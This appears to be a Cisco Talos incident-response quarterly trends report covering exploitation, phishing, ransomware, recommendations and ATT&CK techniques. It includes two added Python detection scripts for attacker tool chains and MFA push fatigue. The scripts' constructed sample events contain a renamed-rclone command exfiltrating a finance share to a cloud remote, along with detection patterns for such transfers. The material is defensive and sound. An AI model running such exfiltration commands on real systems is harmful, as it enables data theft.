IR Trends Q4 2025: Exploitation remains dominant, phishing campaign targets Native American tribal organizations

Threat actors predominantly exploited public-facing applications for the second quarter in a row, with this tactic appearing in nearly 40 percent of Cisco Talos Incident Response (Talos IR) engagements — a notable decrease from over 60 percent last quarter, when engagements involving ToolShell surged. This quarter included exploitation of Oracle E-Business Suite (EBS) and React2Shell, as well as the deployment of malware implants previously associated with advanced persistent threat (APT) groups.
Phishing was the second-most common tactic for initial access, and this quarter included a campaign specifically targeting Native American tribal organizations for credential harvesting. Once the adversaries compromised a legitimate account, they leveraged it to send further internal phishes and harvest more credentials.
Ransomware incidents made up only approximately 13 percent of engagements this quarter, a decrease from 20 percent last quarter and a steep drop from nearly 50 percent in Q1 and Q2. Talos IR did not respond to any previously unseen ransomware variants. Qilin continues to be a dominant player in these engagements, a continuation from the previous few quarters.
Continued exploitation campaigns show the importance of timely patching
As mentioned above, threat actors exploited public-facing applications for initial access in nearly 40 percent of engagements this quarter. While there was no dominant exploitation campaign as there was last quarter with ToolShell, Talos IR did observe activity targeting Oracle EBS (CVE-2025-61882) as well as React Server Components, Next.js, and related frameworks (CVE-2025-55182 aka React2Shell). In both cases, exploitation activity occurred around the time the vulnerability became public, demonstrating actors’ speed in capitalizing on these opportunities as well as the inherent risks of internet-facing enterprise applications and default deployments embedded in widely used frameworks.
Talos IR responded to an organization that had an internet-facing server vulnerable to CVE-2025-61882. Exploitation began very shortly after the vulnerability was made public and was likely related to a large-scale campaign aiming to extort executives. After exploiting the vulnerability, the threat actors deployed multi-stage web shells related to the SAGE* infection chain.
In another incident, we observed a threat actor successfully exploit the React2Shell vulnerability to compromise the victim organization, gain shell access to the web server, and download and install XMRig Monero cryptomining malware. Cryptocurrency mining is one of the many types of operations we expect to see as threat actors race to quickly capitalize on unpatched systems. Public reporting on React2Shell exploitation also revealed targeting by state-sponsored groups, ransomware affiliates, and more, highlighting the diverse array of threat actors who look to leverage new exploits and the importance of timely patching and other mitigations, such as robust segmentation.
Exploitation activity this quarter also involved implants previously tied to APT groups. In one incident, Talos IR observed activity consistent with the BadCandy implant targeting Cisco IOS XE. The threat actors leveraged this implant to create an unauthorized account, though the activity appeared to be automated with no interactive access or additional malicious activity observed outside the router.
In an incident in which exploitation of the organization’s Cisco Secure Management Appliance (SMA) was suspected, the adversaries deployed AquaShell, a lightweight Python backdoor that Talos has connected to UAT-9686. AquaShell receives encoded commands through unauthenticated HTTP POST requests and executes them in the system shell. As in the IOS XE incident above, no follow-on activity was observed. In both incidents, Talos IR commended the customers for their quick responses, which likely helped mitigate any further damage.
Phishing campaigns target Native American tribal organizations for potential credential harvesting operation
Phishing was the second-most common means of initial access this quarter, and Talos IR responded to a phishing campaign that appeared to target Native American tribal organizations.
In one incident affecting a tribal organization, Talos IR observed adversaries use compromised email accounts, alongside a legitimate but compromised web domain, to distribute lures themed around sexual harassment training. Although initial waves were unsuccessful, once the adversaries compromised an account, they used it to propagate further phishing internally and externally. In the latter phases of this campaign, the adversary leveraged a web shell directory hosted on a legitimate third-party domain to distribute phishing content and facilitate broader targeting. We suspect that the attacker gained a foothold within the victim environment due to a lack of multi-factor authentication (MFA), and while no lateral movement beyond email account abuse could be confirmed, the exposure of additional accounts within the victim’s environment and of external recipients indicates the potential for a wider impact.
In a second related incident affecting another tribal organization, Talos IR observed the victim receive a wave of external phishing emails, with one user targeted with numerous Outlook Web Access (OWA) login attempts, resulting in subsequent MFA prompts, one of which was approved. Afterwards, the compromised user’s account was used to issue a flood of follow-on phishing emails. After the customer removed the compromised account, the campaign continued, leveraging an external email address that was spoofed to resemble the disabled account.
Beyond similar victimology, there were overlaps in the indicators of compromise for these incidents, suggesting they may have originated from the same campaign. Both incidents also highlight a trend observed last quarter of compromised accounts being used to distribute further phishing attacks. Talos IR urges tribal organizations to be especially vigilant of this threat, scrutinizing all emails and MFA pushes.
Ransomware trends
Ransomware and pre-ransomware incidents made up just 13 percent of engagements this quarter, a decline from 20 percent last quarter, and a sharp drop from 50 percent in Q1 and Q2. Qilin ransomware, which we responded to for the first time in Q2, remains dominant and was observed in the majority of ransomware incidents, confirming our predictions in Q2 and Q3 that the group would continue to hold a heavy presence. We also responded to DragonForce ransomware, a variant we had not observed in Talos IR engagements for over a year.
Talos IR responded to a ransomware incident in which the adversary relied on several legitimate tools, including remote monitoring and management (RMM) software, across the attack chain. After leveraging valid accounts for initial access, they used ScreenConnect for persistence, SoftPerfect Network Scanner for reconnaissance, and rclone to exfiltrate data. This is a trend we have observed in other threat activity as well, such as a social engineering campaign this quarter in which the threat actors used multiple RMM tools for initial access and persistence. Relying on multiple tools keeps the attack moving if one of them is detected or blocked by security controls. In addition, because these tools may be legitimately used in an environment, they may be harder for defenders to detect in the first place.
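The practical defender's answer to the tool chain described above is to treat legitimate tools as suspicious by context: alert on RMM agents on hosts where they are not sanctioned, on scanner binaries wherever they run, on rclone by its command line rather than its (often renamed) file name, and escalate when several of these fire on one host within a short window. The following detection logic is an added example written for this page, not Talos IR tooling. The process-creation event schema, the approved-RMM inventory, the regular expressions, the six-hour correlation window and the sample events are all assumptions; the events are constructed, not real telemetry.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Hosts where each RMM tool is sanctioned (assumed inventory; fill from your CMDB).
APPROVED_RMM = {"ScreenConnect": {"host-admin01"}}

# Image-name signatures. Extend this dict with the RMM agents used in your environment.
RMM_IMAGES = {
    "ScreenConnect": re.compile(r"^screenconnect\.(clientservice|windowsclient|client)\.exe$", re.I),
}
SCANNER_IMAGES = re.compile(r"^netscan(64)?\.exe$", re.I)  # SoftPerfect Network Scanner
# rclone is frequently renamed, so match the command line, not just the image name:
# an rclone verb, a "remote:path" argument and at least one typical rclone flag.
RCLONE_VERB_AND_REMOTE = re.compile(r"\b(copy|sync|move|copyto|moveto)\b.*\b[\w-]+:\S*", re.I)
RCLONE_FLAGS = re.compile(r"--(config|transfers|no-check-certificate|ignore-existing|auto-confirm|progress)\b", re.I)
CHAIN_WINDOW = timedelta(hours=6)

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"ts": "2025-10-14T01:12:03", "host": "fs01", "user": r"CORP\jdoe",
     "image": r"C:\Users\jdoe\AppData\Local\Temp\ScreenConnect.ClientService.exe",
     "cmdline": r'"ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.example.com&p=443"'},
    {"ts": "2025-10-14T01:40:10", "host": "fs01", "user": r"CORP\jdoe",
     "image": r"C:\ProgramData\ns\netscan.exe",
     "cmdline": r"netscan.exe /hide /auto:scan.xml /range:10.0.0.1-10.0.0.254"},
    {"ts": "2025-10-14T02:05:44", "host": "fs01", "user": r"CORP\jdoe",
     "image": r"C:\ProgramData\svchost.exe",  # renamed rclone
     "cmdline": r'svchost.exe copy "D:\Shares\Finance" mega:finance --transfers 32 --config C:\ProgramData\r.conf'},
    {"ts": "2025-10-14T09:00:00", "host": "host-admin01", "user": r"CORP\helpdesk",
     "image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "cmdline": r'"ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.example.com&p=443"'},
    {"ts": "2025-10-14T09:30:00", "host": "ws22", "user": r"CORP\asmith",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": r"notepad.exe notes.txt"},
]


def _image_name(path):
    return PureWindowsPath(path).name


def classify(event):
    """Return (rule, reason) for one process-creation event, or None if nothing fires."""
    name = _image_name(event["image"])
    cmd = event["cmdline"]
    for tool, pattern in RMM_IMAGES.items():
        if pattern.match(name) and event["host"] not in APPROVED_RMM.get(tool, set()):
            return "unapproved_rmm", f"{tool} running on a host outside the approved inventory"
    if SCANNER_IMAGES.match(name):
        return "network_scanner", "SoftPerfect Network Scanner executed"
    if name.lower() == "rclone.exe" or (RCLONE_VERB_AND_REMOTE.search(cmd) and RCLONE_FLAGS.search(cmd)):
        return "rclone_exfil", "rclone-style transfer to a remote (binary may be renamed)"
    return None


def detect(events):
    """Run classify() over all events, then correlate distinct tool categories per host."""
    alerts, per_host = [], defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        hit = classify(e)
        if hit is None:
            continue
        rule, reason = hit
        alert = {"rule": rule, "host": e["host"], "user": e["user"], "ts": e["ts"], "reason": reason}
        alerts.append(alert)
        per_host[e["host"]].append(alert)
    # Several distinct tool categories on one host inside the window is the
    # multi-tool chain the report describes; raise it as its own higher-severity alert.
    for host, hits in per_host.items():
        first, last = datetime.fromisoformat(hits[0]["ts"]), datetime.fromisoformat(hits[-1]["ts"])
        rules = sorted({h["rule"] for h in hits})
        if len(rules) >= 2 and last - first <= CHAIN_WINDOW:
            alerts.append({"rule": "tool_chain", "host": host, "user": None, "ts": hits[-1]["ts"],
                           "reason": "multiple attacker-tool categories: " + ", ".join(rules)})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

On the constructed sample, the sanctioned ScreenConnect instance on `host-admin01` and the notepad launch are silent, while `fs01` produces three tool alerts and a `tool_chain` alert. The rclone rule deliberately ignores the file name in the third event, which is the case that a simple hash or image-name block list misses.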
Targeting

Consistent with last quarter, public administration was the most-targeted industry vertical. This is noteworthy as last quarter was the first time since we began publishing these reports that public administration held this position. Organizations within the public administration sector are attractive targets as they are often underfunded and use legacy equipment. These entities may have access to sensitive data as well as a low downtime tolerance, making them attractive to financially motivated and espionage-focused threat groups. We observed exploitation and phishing campaigns targeting these organizations, with one successful phishing campaign leveraging a compromised account to send out follow-on internal and external phishes, making the messages appear more legitimate.
Initial access

Also consistent with last quarter, the most observed means of gaining initial access was exploitation of public-facing applications, accounting for over a third of the engagements where initial access could be determined. As mentioned, this is a sharp drop from 62 percent last quarter in which widespread ToolShell exploitation occurred. Other observed means of initial access included phishing, which increased from 23 percent last quarter to 32 percent, as well as valid accounts and brute forcing.
Recommendations for addressing top security weaknesses

Conduct robust patch management
35 percent of engagements this quarter involved vulnerable or exposed infrastructure, aligning with the percentage of engagements in which Talos IR observed exploitation of public-facing applications. This included exploitation of the React2Shell vulnerability, Oracle EBS, as well as exposed Cisco products such as Cisco IOS XE WebUI. These latter incidents underscore the importance of limiting the exposure of vulnerable and high-value servers. Though some of these vulnerabilities were older, once again highlighting the fact that adversaries can find success with years-old exploits, others were targeted right around disclosure, showing the importance of timely patching. Relatedly, there were several incidents in which exposed GitHub secrets were leveraged to access and exfiltrate sensitive data.
Implement detections to identify MFA abuse and strong MFA policies
MFA issues, including misconfigured MFA, lack of MFA, and MFA bypass, were another top security weakness this quarter, aligning with phishing being the second-most prominent initial access technique. The incidents this quarter included environments with no MFA at all and MFA fatigue attacks, in which repeated push prompts were sent until a user approved one. For effective MFA deployment, Talos IR recommends configuring systems to monitor and alert on the following: abuse of bypass codes, registration of new devices, creation of accounts designed to bypass or be exempt from MFA, and removal of accounts from MFA.
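Detection logic for the two MFA weaknesses the report calls out: the push-fatigue pattern from the second tribal-organization incident (repeated OWA login attempts, a run of MFA prompts, one approval) and the posture-change events listed in the recommendation above. This is an added example written for this page, not Talos IR tooling. The event schema and field names, the thresholds, and the sample events are all assumptions; the events are constructed, not real identity-provider telemetry, and a real deployment would map Entra ID, Okta or Duo log fields onto this shape first.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample identity-provider events (not real telemetry).
SAMPLE_EVENTS = [
    # Six prompts in under four minutes, then one approval: push fatigue.
    {"ts": "2025-11-03T08:00:05", "user": "jdoe", "event": "mfa_push", "result": "denied", "ip": "203.0.113.7"},
    {"ts": "2025-11-03T08:00:40", "user": "jdoe", "event": "mfa_push", "result": "timeout", "ip": "203.0.113.7"},
    {"ts": "2025-11-03T08:01:10", "user": "jdoe", "event": "mfa_push", "result": "denied", "ip": "203.0.113.7"},
    {"ts": "2025-11-03T08:01:55", "user": "jdoe", "event": "mfa_push", "result": "timeout", "ip": "203.0.113.7"},
    {"ts": "2025-11-03T08:02:30", "user": "jdoe", "event": "mfa_push", "result": "denied", "ip": "203.0.113.7"},
    {"ts": "2025-11-03T08:03:05", "user": "jdoe", "event": "mfa_push", "result": "denied", "ip": "203.0.113.7"},
    {"ts": "2025-11-03T08:03:40", "user": "jdoe", "event": "mfa_push", "result": "approved", "ip": "203.0.113.7"},
    # The attacker then enrolls their own device so later logins need no victim approval.
    {"ts": "2025-11-03T08:05:12", "user": "jdoe", "event": "mfa_device_registered", "result": "success", "ip": "203.0.113.7"},
    # Ordinary user: one mis-tap, then approval. Must not alert.
    {"ts": "2025-11-03T09:10:00", "user": "asmith", "event": "mfa_push", "result": "denied", "ip": "192.0.2.10"},
    {"ts": "2025-11-03T09:11:00", "user": "asmith", "event": "mfa_push", "result": "approved", "ip": "192.0.2.10"},
    # Administrative changes that weaken MFA coverage and should always be reviewed.
    {"ts": "2025-11-03T10:22:41", "user": "svc-backup", "event": "mfa_exempted", "result": "success", "ip": "10.0.0.5", "actor": "admin1"},
    {"ts": "2025-11-03T11:02:09", "user": "bkim", "event": "mfa_bypass_code_used", "result": "success", "ip": "198.51.100.9"},
]

PUSH_FATIGUE_THRESHOLD = 5              # prompts before the approval (assumed tuning value)
PUSH_FATIGUE_WINDOW = timedelta(minutes=10)
DEVICE_FOLLOWUP_WINDOW = timedelta(minutes=30)
# Events that change an account's MFA posture; each maps to the report's recommendation list.
POSTURE_CHANGE_EVENTS = {
    "mfa_bypass_code_used": "MFA bypass code used",
    "mfa_device_registered": "new MFA device registered",
    "mfa_exempted": "account exempted from MFA",
    "mfa_removed": "MFA removed from account",
}


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def detect_push_fatigue(events, threshold=PUSH_FATIGUE_THRESHOLD, window=PUSH_FATIGUE_WINDOW):
    """Flag an approval preceded by at least `threshold` prompts inside `window`."""
    pushes, registrations = defaultdict(list), defaultdict(list)
    for e in sorted(events, key=_ts):
        if e["event"] == "mfa_push":
            pushes[e["user"]].append(e)
        elif e["event"] == "mfa_device_registered":
            registrations[e["user"]].append(e)
    alerts = []
    for user, seq in pushes.items():
        for i, e in enumerate(seq):
            if e["result"] != "approved":
                continue
            approved_at = _ts(e)
            prior = [p for p in seq[:i] if approved_at - _ts(p) <= window]
            if len(prior) < threshold:
                continue
            # A device enrolled shortly after a fatigued approval means the attacker
            # no longer needs the victim's cooperation; escalate that case.
            followup = [r for r in registrations[user]
                        if timedelta(0) <= _ts(r) - approved_at <= DEVICE_FOLLOWUP_WINDOW]
            alerts.append({
                "rule": "mfa_push_fatigue",
                "user": user,
                "prompts_before_approval": len(prior),
                "source_ips": sorted({p["ip"] for p in prior + [e]}),
                "severity": "critical" if followup else "high",
            })
    return alerts


def detect_posture_changes(events):
    """Every MFA posture change is worth a ticket; there is no threshold to tune."""
    return [{"rule": "mfa_posture_change", "user": e["user"],
             "detail": POSTURE_CHANGE_EVENTS[e["event"]], "actor": e.get("actor", e["user"])}
            for e in events if e["event"] in POSTURE_CHANGE_EVENTS]


def run_detections(events):
    return detect_push_fatigue(events) + detect_posture_changes(events)


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```

On the constructed sample, `jdoe` produces one critical push-fatigue alert (six prompts, then an approval, then a device enrollment from the same address), `asmith` produces nothing, and the three posture changes each produce their own alert. The push-fatigue rule counts timeouts as well as explicit denials, because an attacker spamming prompts at an inattentive user generates mostly timeouts.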
Configure centralized logging capabilities across the environment
Insufficient logging capabilities once again hindered investigative efforts by Talos IR. Understanding the full context and chain of events performed by an adversary on a targeted host is vital not only for remediation but also for enhancing defenses and addressing any system vulnerabilities for the future. Talos IR recommends that organizations implement a Security Information and Event Management (SIEM) solution for centralized logging. In the event an adversary deletes or modifies logs on the host, the SIEM will still hold the original copies to support forensic investigation.
Timely response is paramount
Finally, several incidents this quarter revealed the value of quick responses, such as several exploitation attacks against Cisco products in which timely cooperation with Talos IR helped prevent follow-on attacks. This quarter, we also responded to a ransomware incident in which an organization delayed engaging with Talos IR and was therefore unable to prevent encryption or exfiltration of sensitive data. For more information on how timely response can dramatically improve outcomes, please see this blog.
Top-observed MITRE ATT&CK techniques
The table below represents the MITRE ATT&CK techniques observed in this quarter’s Talos IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. Please note this is not an exhaustive list.
Key findings from the MITRE ATT&CK framework include:
- Adversaries leveraged a wider variety of reconnaissance and discovery techniques this quarter compared to last quarter, including discovery of remote systems, domain trust relationships, and valid accounts.
- This was the second quarter in a row where exploitation of public-facing applications was the top initial access technique.
- Use of Remote Desktop Protocol (RDP) was the top technique for lateral movement for the second quarter in a row.
| Tactic | Technique | Description |
|---|---|---|
| Reconnaissance | T1597 Search Open Websites/Domains | Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. |
| | T1018 Remote System Discovery | Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network. |
| | T1482 Domain Trust Discovery | Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. |
| | T1087 Account Discovery | Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. |
| Initial Access | T1190 Exploit Public-Facing Application | Adversaries may exploit a vulnerability to gain access to a target system. |
| | T1598 Phishing for Information | Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. |
| | T1078 Valid Accounts | Adversaries may steal and abuse the credentials of a specific user or service account using credential access techniques. |
| | T1110 Brute Force | Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. |
| Execution | T1059 Command and Scripting Interpreter | Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. |
| | T1204.001 User Execution: Malicious Link | An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. |
| | T1204.002 User Execution: Malicious File | An adversary may rely upon a user opening a malicious file in order to gain execution. |
| | T1078 Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts to access systems within the network and execute their payload. |
| | T1047 Windows Management Instrumentation | Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. |
| | T1505.003 Server Software Component: Web Shell | Adversaries may backdoor web servers with web shells to establish persistent access to systems. |
| Persistence | T1136 Create Account | Adversaries may create an account to maintain access to victim systems. |
| | T1219 Remote Access Tools | An adversary may use legitimate remote access tools to establish an interactive command and control channel within a network. |
| | T1059 Command and Scripting Interpreter | Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. |
| | T1053 Scheduled Task/Job | Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. |
| | T1078 Valid Accounts | The adversary may compromise a valid account to move through the network to additional systems. |
| Defense Evasion | T1562 Impair Defenses | Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. |
| | T1070 Indicator Removal | Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. |
| | T1218 System Binary Proxy Execution | Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. |
| | T1564.008 Hide Artifacts: Email Hiding Rules | Adversaries may use email rules to hide inbound or outbound emails in a compromised user’s mailbox. |
| | T1112 Modify Registry | The Registry may be modified in order to hide configuration information or malicious payloads. |
| Credential Access | T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting | Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets; in Kerberoasting, service tickets for accounts with service principal names are requested and cracked offline to recover the account password. |
| | T1003 OS Credential Dumping | Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. |
| | T1111 Multi-Factor Authentication Interception | Adversaries may target MFA mechanisms (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. |
| | T1552.001 Unsecured Credentials: Credentials In Files | Adversaries may search compromised systems to find and obtain insecurely stored credentials. |
| | T1110 Brute Force | Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. |
| Discovery | T1087 Account Discovery | Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. |
| | T1082 System Information Discovery | An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. |
| | T1083 File and Directory Discovery | Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. |
| | T1016 System Network Configuration Discovery | Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. |
| | T1046 Network Service Discovery | Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. |
| Lateral Movement | T1021.001 Remote Services: Remote Desktop Protocol | Adversaries may use Valid Accounts to log into a computer using RDP. The adversary may then perform actions as the logged-on user. |
| | T1021.002 Remote Services: SMB/Windows Admin Shares | Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user. |
| Command and Control | T1071 Application Layer Protocol | Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. |
| | T1008 Fallback Channels | Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds. |
| | T1105 Ingress Tool Transfer | Adversaries may transfer tools or other files from an external system into a compromised environment. |
| | T1090 Proxy | Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. |
| Exfiltration | T1041 Exfiltration Over C2 Channel | Adversaries may steal data by exfiltrating it over an existing command and control channel. |
| | T1567 Exfiltration Over Web Service | Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. |
| Impact | T1486 Data Encrypted for Impact | Adversaries may use ransomware to encrypt data on a target system. |
| | T1485 Data Destruction | Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. |
| | T1489 Service Stop | Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. |
| Software | S1242 Qilin | A Ransomware-as-a-Service (RaaS) that has been active since at least 2022 with versions written in Golang and Rust that are capable of targeting Windows or VMware ESXi devices. |
| | S0591 ConnectWise | A legitimate remote administration tool that has been used since at least 2016 by threat actors. |
| | S1040 Rclone | A command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. |
| | S0029 PsExec | Free Microsoft tool that can remotely execute programs on a target system. |
Source: Cisco Talos Blog